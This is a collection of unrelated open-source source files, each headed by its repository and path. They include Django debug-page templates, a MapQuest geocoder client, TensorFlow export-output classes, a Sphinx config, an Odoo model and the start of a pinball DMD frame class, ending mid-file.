<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard 500 page.
</p>
</div>
{% endif %}
</body>
</html>
"""
TECHNICAL_500_TEXT_TEMPLATE = """{% load firstof from future %}{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception message supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} ({{ t.status }})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:
{% for frame in frames %}File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard 500 page.
"""
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>Welcome to Django</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>It worked!</h1>
<h2>Congratulations on your first Django-powered page.</h2>
</div>
<div id="instructions">
<p>
Of course, you haven't actually done any work yet.
Next, start your first app by running <code>python manage.py startapp [appname]</code>.
</p>
</div>
<div id="explanation">
<p>
You're seeing this message because you have <code>DEBUG = True</code> in your
Django settings file and you haven't configured any URLs. Get to work!
</p>
</div>
</body></html>
"""
|
katevontaine/myblog2
|
refs/heads/master
|
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/generator/gypsh.py
|
2779
|
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypsh output module
gypsh is a GYP shell. It's not really a generator per se. All it does is
fire up an interactive Python session with a few local variables set to the
variables passed to the generator. Like gypd, it's intended as a debugging
aid, to facilitate the exploration of .gyp structures after being processed
by the input module.
The expected usage is "gyp -f gypsh -D OS=desired_os".
"""
import code
import sys
# All of this stuff about generator variables was lovingly ripped from gypd.py.
# That module has a much better description of what's going on and why.
_generator_identity_variables = [
'EXECUTABLE_PREFIX',
'EXECUTABLE_SUFFIX',
'INTERMEDIATE_DIR',
'PRODUCT_DIR',
'RULE_INPUT_ROOT',
'RULE_INPUT_DIRNAME',
'RULE_INPUT_EXT',
'RULE_INPUT_NAME',
'RULE_INPUT_PATH',
'SHARED_INTERMEDIATE_DIR',
]
generator_default_variables = {
}
for v in _generator_identity_variables:
generator_default_variables[v] = '<(%s)' % v
def GenerateOutput(target_list, target_dicts, data, params):
locals = {
'target_list': target_list,
'target_dicts': target_dicts,
'data': data,
}
# Use a banner that looks like the stock Python one and like what
# code.interact uses by default, but tack on something to indicate what
# locals are available, and identify gypsh.
banner='Python %s on %s\nlocals.keys() = %s\ngypsh' % \
(sys.version, sys.platform, repr(sorted(locals.keys())))
code.interact(banner, local=locals)
|
seguijoaquin/taller2-appserver
|
refs/heads/master
|
Appserver/Test/ApiUnitTesting/requests/packages/chardet/compat.py
|
2942
|
######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a
|
miraculixx/geocoder
|
refs/heads/master
|
geocoder/mapquest.py
|
3
|
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
import re
import requests
from geocoder.base import Base
from geocoder.keys import mapquest_key
class Mapquest(Base):
"""
MapQuest
========
The geocoding service enables you to take an address and get the
associated latitude and longitude. You can also use any latitude
and longitude pair and get the associated address. Three types of
geocoding are offered: address, reverse, and batch.
API Reference
-------------
http://www.mapquestapi.com/geocoding/
"""
provider = 'mapquest'
method = 'geocode'
def __init__(self, location, **kwargs):
self.url = 'http://www.mapquestapi.com/geocoding/v1/address'
self.location = location
self.headers = {
'referer': 'http://www.mapquestapi.com/geocoding/',
'host': 'www.mapquestapi.com',
}
self.params = {
'key': self._get_mapquest_key(**kwargs),
'location': location,
'maxResults': 1,
}
self._initialize(**kwargs)
def _get_mapquest_key(self, **kwargs):
key = kwargs.get('key', mapquest_key)
if key:
return key
if not key:
url = 'http://www.mapquestapi.com/media/js/config_key.js'
timeout = kwargs.get('timeout', 5.0)
proxies = kwargs.get('proxies', '')
try:
r = requests.get(url, timeout=timeout, proxies=proxies)
text = r.content
except:
self.error = 'ERROR - Could not retrieve API Key'
self.status_code = 404
expression = r"APP_KEY = '(.+)'"
pattern = re.compile(expression)
match = pattern.search(text)
if match:
return match.group(1)
else:
self.error = 'ERROR - No API Key'
def _exceptions(self):
# Build intial Tree with results
if self.parse['results']:
self._build_tree(self.parse['results'][0])
if self.parse['locations']:
self._build_tree(self.parse['locations'][0])
@property
def lat(self):
return self.parse['latLng'].get('lat')
@property
def lng(self):
return self.parse['latLng'].get('lng')
@property
def street(self):
return self.parse.get('street')
@property
def address(self):
if self.street:
return self.street
elif self.city:
return self.city
elif self.country:
return self.country
@property
def quality(self):
return self.parse.get('geocodeQuality')
@property
def postal(self):
return self.parse.get('postalCode')
@property
def neighborhood(self):
return self.parse.get('adminArea6')
@property
def city(self):
return self.parse.get('adminArea5')
@property
def county(self):
return self.parse.get('adminArea4')
@property
def state(self):
return self.parse.get('adminArea3')
@property
def country(self):
return self.parse.get('adminArea1')
if __name__ == '__main__':
g = Mapquest('1552 Payette dr., Ottawa Ontario')
g.debug()
|
JuliaPackageMirrors/ReverseDiffSource.jl
|
refs/heads/master
|
doc/conf.py
|
5
|
# -*- coding: utf-8 -*-
#
# ReverseDiffSource documentation build configuration file, created by
# sphinx-quickstart on Tue Jun 17 11:18:11 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.mathjax',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ReverseDiffSource'
copyright = u'2014, Frédéric Testard'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ReverseDiffSourcedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'ReverseDiffSource.tex', u'ReverseDiffSource Documentation',
u'Frédéric Testard', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'reversediffsource', u'ReverseDiffSource Documentation',
[u'Frédéric Testard'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ReverseDiffSource', u'ReverseDiffSource Documentation',
u'Frédéric Testard', 'ReverseDiffSource', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
alexcuellar/odoo
|
refs/heads/8.0
|
addons/payment_sips/controllers/__init__.py
|
4497
|
# -*- coding: utf-8 -*-
import main
|
npuichigo/ttsflow
|
refs/heads/master
|
third_party/tensorflow/tensorflow/python/estimator/export/export_output.py
|
37
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes for different types of export output."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import signature_def_utils
class ExportOutput(object):
"""Represents an output of a model that can be served.
These typically correspond to model heads.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def as_signature_def(self, receiver_tensors):
"""Generate a SignatureDef proto for inclusion in a MetaGraphDef.
The SignatureDef will specify outputs as described in this ExportOutput,
and will use the provided receiver_tensors as inputs.
Args:
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes that will be fed.
"""
pass
class ClassificationOutput(ExportOutput):
"""Represents the output of a classification head.
Either classes or scores or both must be set.
The classes `Tensor` must provide string labels, not integer class IDs.
If only classes is set, it is interpreted as providing top-k results in
descending order.
If only scores is set, it is interpreted as providing a score for every class
in order of class ID.
If both classes and scores are set, they are interpreted as zipped, so each
score corresponds to the class at the same index. Clients should not depend
on the order of the entries.
"""
def __init__(self, scores=None, classes=None):
"""Constructor for `ClassificationOutput`.
Args:
scores: A float `Tensor` giving scores (sometimes but not always
interpretable as probabilities) for each class. May be `None`, but
only if `classes` is set. Interpretation varies-- see class doc.
classes: A string `Tensor` giving predicted class labels. May be `None`,
but only if `scores` is set. Interpretation varies-- see class doc.
Raises:
ValueError: if neither classes nor scores is set, or one of them is not a
`Tensor` with the correct dtype.
"""
if (scores is not None
and not (isinstance(scores, ops.Tensor)
and scores.dtype.is_floating)):
raise ValueError('Classification scores must be a float32 Tensor; '
'got {}'.format(scores))
if (classes is not None
and not (isinstance(classes, ops.Tensor)
and dtypes.as_dtype(classes.dtype) == dtypes.string)):
raise ValueError('Classification classes must be a string Tensor; '
'got {}'.format(classes))
if scores is None and classes is None:
raise ValueError('At least one of scores and classes must be set.')
self._scores = scores
self._classes = classes
@property
def scores(self):
return self._scores
@property
def classes(self):
return self._classes
def as_signature_def(self, receiver_tensors):
if len(receiver_tensors) != 1:
raise ValueError('Classification input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
(_, examples), = receiver_tensors.items()
if dtypes.as_dtype(examples.dtype) != dtypes.string:
raise ValueError('Classification input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
return signature_def_utils.classification_signature_def(
examples, self.classes, self.scores)
class RegressionOutput(ExportOutput):
"""Represents the output of a regression head."""
def __init__(self, value):
"""Constructor for `RegressionOutput`.
Args:
value: a float `Tensor` giving the predicted values. Required.
Raises:
ValueError: if the value is not a `Tensor` with dtype tf.float32.
"""
if not (isinstance(value, ops.Tensor) and value.dtype.is_floating):
raise ValueError('Regression output value must be a float32 Tensor; '
'got {}'.format(value))
self._value = value
@property
def value(self):
return self._value
def as_signature_def(self, receiver_tensors):
if len(receiver_tensors) != 1:
raise ValueError('Regression input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
(_, examples), = receiver_tensors.items()
if dtypes.as_dtype(examples.dtype) != dtypes.string:
raise ValueError('Regression input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
return signature_def_utils.regression_signature_def(examples, self.value)
class PredictOutput(ExportOutput):
"""Represents the output of a generic prediction head.
A generic prediction need not be either a classification or a regression.
Named outputs must be provided as a dict from string to `Tensor`,
"""
def __init__(self, outputs):
"""Constructor for PredictOutput.
Args:
outputs: A dict of string to `Tensor` representing the predictions.
Raises:
ValueError: if the outputs is not dict, or any of its keys are not
strings, or any of its values are not `Tensor`s.
"""
if not isinstance(outputs, dict):
raise ValueError(
'Prediction outputs must be given as a dict of string to Tensor; '
'got {}'.format(outputs))
for key, value in outputs.items():
if not isinstance(key, six.string_types):
raise ValueError(
'Prediction output key must be a string; got {}.'.format(key))
if not isinstance(value, ops.Tensor):
raise ValueError(
'Prediction output value must be a Tensor; got {}.'.format(value))
self._outputs = outputs
@property
def outputs(self):
return self._outputs
def as_signature_def(self, receiver_tensors):
return signature_def_utils.predict_signature_def(receiver_tensors,
self.outputs)
|
ARMP/ARM-Project
|
refs/heads/master
|
tools/perf/python/twatch.py
|
3213
|
#! /usr/bin/python
# -*- python -*-
# -*- coding: utf-8 -*-
# twatch - Experimental use of the perf python interface
# Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com>
#
# This application is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import perf
def main():
cpus = perf.cpu_map()
threads = perf.thread_map()
evsel = perf.evsel(task = 1, comm = 1, mmap = 0,
wakeup_events = 1, sample_period = 1,
sample_id_all = 1,
sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID)
evsel.open(cpus = cpus, threads = threads);
evlist = perf.evlist(cpus, threads)
evlist.add(evsel)
evlist.mmap()
while True:
evlist.poll(timeout = -1)
for cpu in cpus:
event = evlist.read_on_cpu(cpu)
if not event:
continue
print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu,
event.sample_pid,
event.sample_tid),
print event
if __name__ == '__main__':
main()
|
ivan-fedorov/intellij-community
|
refs/heads/master
|
python/lib/Lib/site-packages/django/contrib/messages/storage/user_messages.py
|
308
|
"""
Storages used to assist in the deprecation of contrib.auth User messages.
"""
from django.contrib.messages import constants
from django.contrib.messages.storage.base import BaseStorage, Message
from django.contrib.auth.models import User
from django.contrib.messages.storage.fallback import FallbackStorage
class UserMessagesStorage(BaseStorage):
"""
Retrieves messages from the User, using the legacy user.message_set API.
This storage is "read-only" insofar as it can only retrieve and delete
messages, not store them.
"""
session_key = '_messages'
def _get_messages_queryset(self):
"""
Returns the QuerySet containing all user messages (or ``None`` if
request.user is not a contrib.auth User).
"""
user = getattr(self.request, 'user', None)
if isinstance(user, User):
return user._message_set.all()
def add(self, *args, **kwargs):
raise NotImplementedError('This message storage is read-only.')
def _get(self, *args, **kwargs):
"""
Retrieves a list of messages assigned to the User. This backend never
stores anything, so all_retrieved is assumed to be False.
"""
queryset = self._get_messages_queryset()
if queryset is None:
# This is a read-only and optional storage, so to ensure other
# storages will also be read if used with FallbackStorage an empty
# list is returned rather than None.
return [], False
messages = []
for user_message in queryset:
messages.append(Message(constants.INFO, user_message.message))
return messages, False
def _store(self, messages, *args, **kwargs):
"""
Removes any messages assigned to the User and returns the list of
messages (since no messages are stored in this read-only storage).
"""
queryset = self._get_messages_queryset()
if queryset is not None:
queryset.delete()
return messages
class LegacyFallbackStorage(FallbackStorage):
"""
Works like ``FallbackStorage`` but also handles retrieving (and clearing)
contrib.auth User messages.
"""
storage_classes = (UserMessagesStorage,) + FallbackStorage.storage_classes
|
pombredanne/pyjs
|
refs/heads/master
|
examples/kitchensink/sink/Logger.py
|
6
|
from pyjamas.ui.Grid import Grid
class Logger(Grid):
instances = []
def __init__(self):
Logger.instances.append(self)
Grid.__init__(self)
self.targets=[]
self.targets.append("app")
#self.targets.append("ui")
self.resize(len(self.targets)+1, 2)
self.setBorderWidth("1")
self.counter=0
self.setHTML(0, 0, "<b>Log</b>")
self.setText(1, 0, "app")
for i in range(len(self.targets)):
target=self.targets[i]
self.setText(i+1, 0, target)
@classmethod
def getSingleton(self):
return Logger.singleton
def setSingleton(self):
Logger.singleton = self
def addTarget(self, target):
self.targets.append(target)
self.resize(len(self.targets)+1, 2)
self.setText(len(self.targets), 0, target)
return self.targets.index(target)
@classmethod
def write(cls, target, message):
for logger in cls.instances:
logger.onMessage(target, message)
def onMessage(self, target, message):
self.counter+=1
if target=='':
target='app'
target_idx=self.targets.index(target)
# add new target
if target_idx<0:
target_idx=self.addTarget(target)
target_row=target_idx+1
old_text=self.getHTML(target_row, 1)
log_line=self.counter + ": " + message
if old_text==' ':
new_text=log_line
else:
new_text=old_text + "<br>" + log_line
self.setHTML(target_row, 1, new_text)
|
florian-dacosta/OpenUpgrade
|
refs/heads/master
|
addons/mail/mail_vote.py
|
439
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
from openerp.osv import fields, osv
class mail_vote(osv.Model):
''' Mail vote feature allow users to like and unlike messages attached
to a document. This allows for example to build a ranking-based
displaying of messages, for FAQ. '''
_name = 'mail.vote'
_description = 'Mail Vote'
_columns = {
'message_id': fields.many2one('mail.message', 'Message', select=1,
ondelete='cascade', required=True),
'user_id': fields.many2one('res.users', 'User', select=1,
ondelete='cascade', required=True),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
scottdanesi/earthshaker-aftershock
|
refs/heads/master
|
procgame/dmd/dmd.py
|
2
|
import pinproc
import time
import os
class Frame(pinproc.DMDBuffer):
"""DMD frame/bitmap.
Subclass of :class:`pinproc.DMDBuffer`.
"""
width = 0
"""Width of the frame in dots."""
height = 0
"""Height of the frame in dots."""
def __init__(self, width, height):
"""Initializes the frame to the given `width` and `height`."""
super(Frame, self).__init__(width, height)
self.width = width
self.height = height
def copy_rect(dst, dst_x, dst_y, src, src_x, src_y, width, height, op="copy"):
"""Static method which performs some type checking before calling :meth:`pinproc.DMDBuffer.copy_to_rect`."""
if not (issubclass(type(dst), pinproc.DMDBuffer) and issubclass(type(src), pinproc.DMDBuffer)):
raise ValueError, "Incorrect types"
src.copy_to_rect(dst, int(dst_x), int(dst_y), int(src_x), int(src_y), int(width), int(height), op)
copy_rect = staticmethod(copy_rect)
def subframe(self, x, y, width, height):
"""Generates a new frame based on a sub rectangle of this frame."""
subframe = Frame(width, height)
Frame.copy_rect(subframe, 0, 0, self, x, y, width, height, 'copy')
return subframe
def copy(self):
"""Returns a copy of itself."""
frame = Frame(self.width, self.height)
frame.set_data(self.get_data())
return frame
def ascii(self):
"""Returns an ASCII representation of itself."""
output = ''
table = [' ', '.', '.', '.', ',', ',', ',', '-', '-', '=', '=', '=', '*', '*', '#', '#',]
for y in range(self.height):
for x in range(self.width):
dot = self.get_dot(x, y)
output += table[dot & 0xf]
output += "\n"
return output
def create_with_text(lines, palette = {' ':0, '*':15}):
"""Create a frame based on text.
This class method can be used to generate small sprites within the game's source code::
frame = Frame.create_with_text(lines=[ \\
'*+++*', \\
' *+* ', \\
' * '], palette={' ':0, '+':7, '*':15})
